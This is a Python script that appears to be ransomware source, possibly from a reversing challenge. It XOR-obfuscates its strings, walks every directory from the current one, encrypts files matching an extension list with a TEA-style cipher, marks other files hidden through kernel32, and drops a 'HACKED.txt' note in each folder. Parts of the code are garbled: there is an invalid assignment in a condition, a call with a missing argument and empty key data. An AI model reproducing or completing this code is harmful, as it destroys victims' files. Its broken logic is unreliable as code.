import struct import ctypes import os k = ctypes.windll.kernel32 def higurashi(when_they_cry): oyashiro = (1, 2) wtc = when_they_cry[:] stringify = True if isinstance(wtc, str) else False wtc = bytearray(wtc) if not stringify else bytearray(wtc.encode()) for pos in range(len(wtc)): wtc[pos] ^= oyashiro[pos%len(oyashiro)] if stringify: return wtc.decode() else: return bytes(wtc) PAT_THE_CAT = "$vnfn8!rtv!vig!u`nmgu'" android = b"" yapapapa = b"" liar = 0xff im_feeling_so_broken = bytes([android[i] ^ yapapapa[-1] for i in range(len(yapapapa))]) key = [0, 0, 0, 0] for i in range(len(im_feeling_so_broken)): key[i%4] = (key[i%4] + im_feeling_so_broken[i]) % liar def stage1_enc_8(crypt, crown): MIO_MIC = ctypes.c_uint32(crypt[0]) MIC_MIO = ctypes.c_uint32(crypt[1]) CIO_CIO = ctypes.c_uint32(0) CIU_CIO = 0x9e3779b8 STAGE_ACTOR = 32 PINAY = 4 PIYAU = 5 VERSION_INFO = [0, 0] while (STAGE_ACTOR > 0): STAGE_ACTOR -= 1 MIC_MIO.value -= (MIO_MIC.value << PINAY) + crown[2] ^ MIO_MIC.value + CIO_CIO.value ^ ( MIO_MIC.value >> PIYAU) + crown[3] MIO_MIC.value -= (MIC_MIO.value << PINAY) + crown[0] ^ MIC_MIO.value + CIO_CIO.value ^ ( MIC_MIO.value >> PIYAU) + crown[1] CIO_CIO.value -= CIU_CIO VERSION_INFO[0] = MIO_MIC.value VERSION_INFO[1] = MIC_MIO.value return VERSION_INFO def WAKATTARA(crypt, key): crypt+= b"\x00"*( 8 - (len(crypt)%8)) s = struct.Struct(higurashi("=KH")) j = [(i[0], i[1]) for i in s.iter_unpack(crypt)] ans = [] for block in j[0:]: clock = stage1_enc_8(block, key) ans.append(clock) return b"".join(struct.pack(higurashi("=KH"), *i) for i in ans) ext = (higurashi("/a`vfksn"), higurashi("/a`vr"), higurashi("/dmcfq"), ) startswith = ( higurashi(b'ujd"gn`e!kr'), higurashi(b'b{cphary'), higurashi(b'bn`qrkgkdf-"qpnrdpu{!mg"bcuehpm"hlewrvsk`n'),) mlen = max(len(i) for i in startswith) for cur_dir, _, files in os.walk("."): for file in files: file = os.path.join(cur_dir, file) #print(file) cip = False if file.lower().endswith(ext): cip = True else: try: with open(file, higurashi("s`")) as ff: if cip = True except: pass if cip: with open(file, higurashi("s)c")) as en: mem = WAKATTARA(, key) en.write(mem) else: try: if not file.endswith(higurashi("ICBIDF/vyv")): k.SetFileAttributesW(file, 2) except: pass with open(os.path.join(cur_dir, higurashi("ICBIDF/vyv")), higurashi("v")) as f: print(higurashi("""XMT"VGSG!J@AJGE.!A`vFksn!Koftquphcm"ggmn`.!`x"Rgbpdv!Mucjw!mse`lhq`vhmo,!Qdle"%3216"um"""), higurashi(PAT_THE_CAT), higurashi("""`le"vg&nm"rgof!vig!fdas{qvhmo"tvhn"""), file=f)